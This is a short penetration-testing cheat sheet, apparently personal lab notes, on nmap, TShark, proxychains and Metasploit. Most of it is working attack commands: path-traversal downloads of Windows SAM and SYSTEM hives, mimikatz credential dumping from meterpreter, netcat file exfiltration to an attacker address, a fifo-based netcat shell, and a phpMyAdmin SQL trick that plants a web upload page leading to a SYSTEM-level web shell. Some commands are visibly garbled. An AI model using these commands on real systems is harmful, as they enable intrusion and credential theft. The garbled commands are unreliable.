Pentesting Cheat Sheet

version .01

Various findings, notes, and more from Pentesting all in one location.

Sections to add: Connecting to proxy, Metasploit, Netcat, Reverse shell tricks, Windows, PHPMyAdmin/SQL

Table of Content:

Table of Contents

1. Nmap
2. Wireshark
3. TShark

---

Nmap

---

Network scanner -

Introduction on port state

• Filtered: Blackhole, no icmp reply back or icmp error (IDS/Stateful firewall blocking). Could vary on scanning technique. Simply put, nMap can't confirm the real status of this port.

• -sV or -A can help detect true state.
• --tcp-flags SYN,FIN to try bypassing the firewall.

• Closed: ICMP port unreachable reply

Getting all host names on a network:

nmap -sS 10.11.1.201-254 -p53 -T4 -oG - | grep "open" nano /etc/resolv.conf host -l dc.name > hostsName cat hostsNames | cut -f1,4 -d " "

---

Wireshark

---

Network analyzer with UI -

Introduction on UI

• Packet List pane displays captured traffic by line.
• Packets Details pane contains data seen in the middle part of Wireshark. The protocols and fields of the packet shown in a tree which can be expanded and collapsed.
• Packets Bytes pane resembles a hex editor.
• DisplayFilters only show what you want filtered
• Capture Filters only capture the specified packets. Capture Filters will save on disk space!

---

TShark

Network analyzer from cli -

Capture filtered traffic @ 5kb and iterated 3 times

tshark -i eth0 -f "port 80 or port 443 or port 53" -b filesize:5 -a files:3 -w /tmp/CAPTURED.pcap cd /tmp; watch -n 1 "ls -ltr"

Capture filter with multiple filters and lines

tshark -i eth0 -f " port 80 or port 443"

Reading traffic captured (-T format, -e field)

tshark -r /tmp/testCap.pcap -T fields -e ip

Reading traffic captured

tshark -r sampleCapture_1.pcap -T fields -e dns -e ip.src | uniq

Decrypting Wireless Traffic

Must have key & ssid - use aircrack-ng before hand

Wireshark > Edit > Preferences > IEEE > Enable decryption. Edit decryption key - format is: password:ssid (p@assw0rd:Xfinity1111)

Decoding video

Set display filter as: ip.addr == (destination ip) && http Locate HTTP/1.1 with video/mp2t In Packet Details frame > Media Type > Media Type (binaries should be selected) > right click > export Open file in VLC - doesn't need a file format.

---

Proxychains

General Usage

ssh -D 127.0.0.1:9050 -N [email protected] -p 22000 cd ~/Desktop/proxy-folder/ cat /etc/proxychains.conf | sed "s/127.0.0.1 9050/127.0.0.1 8090/g" > ./proxychains.conf proxychains nmap -sT -PN -p80 10.1.1.230 proxychains nmap -sT -PN -sV -n 10.1.1.236 -p 21,25,80

proxychains wget http://10.2.2.86/../../../../../WINDOWS/repair/SYSTEM -O SYSTEM proxychains wget http://10.2.2.86/../../../../../WINDOWS/repair/sam -O sam

Connecting to SquidProxy HTTP running on port 3128

Configure proxychains: #socks4 127.0.0.1 9050 http 192.168.195.150 3128

Run scan: proxychains nmap -sT -sV -Pn -n -vvv 127.0.0.1

or run scan with proxytunnel proxytunnel ‐a 25 ‐p 192.168.22.57:3128 ‐d 127.0.0.1:25 nmap -sV -p25 127.0.0.1

Exploiting: proxychains metasploit exploit/unix/smtp/exim4_string_format (local/127.0.0.1/25) Payload cmd/unix/reverse (ipv4 address of attacking machine, 4444)

or exploiting with NC: nc ‐v 192.168.195.150 3128 CONNECT 127.0.0.1:4444 HTTP/1.0

---

Metasploit

Auto migration: set initialautorunscript migrate -f

From meterpreter shell: Any windows payload. This migrates the process before the service crashes and can set a name you want for your process. PrependMigrate. Set this to true. Default is 'false' and default process is rundll. PrependMigrateProc svchost.exe generate -t exe -f /tmp/bob.exe cd temp upload /tmp/bob.exe execute -H -f C:\temp\bob.exe

---

Meterpreter tricks

From meterpreter execute -H -i -c -m -d calc.exe -f /usr/share/wce/wce32[wce64].exe -a -w execute -H -i -c -m -d calc.exe -f /usr/share/mimikatz/Win32[x64]/mimikatz.exe -a '"sekurlsa::logonPasswords full" exit'

---

Transfer files

Transfer files with NC

Kali/Receiving: nc -l -p 4444 > av.zip

Victim/Sending: nc -w 3 192.168.27.10 4444 < av.zip

---

Shells

Reverse shell: nc -lvpn 3333 (from Kali)

On victim: rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc -l 192.168.24.10 3333 > /tmp/f

=========================

---

Windows

Windows checking patches: wmic qfe get Caption,Description,HotFixID,InstalledOn

Finding useful scripts (start at C path): dir /s pass == cred == vnc == .config

---

-- PHPMyAdmin / SQL Shell upload

1. Create database and then table: CREATE DATABASE Upload ; CREATE TABLE Upload.cake (form VARCHAR( 1000 ) NOT NULL) ENGINE = = MYISAM ;

2. Now insert the file upload code:

INSERT INTO Upload.cake VALUES ('

Filename:
')

3. Dump output into file called 'upload.php' SELECT * INTO DUMPFILE 'C:/xampp/htdocs/upload.php' from Upload.cake

4. Visit 192.168.195.123/upload.php and upload any shell to run whatever command.

http://192.168.195.123/simple-backdoor.php?cmd=whoami%00

nt authority\system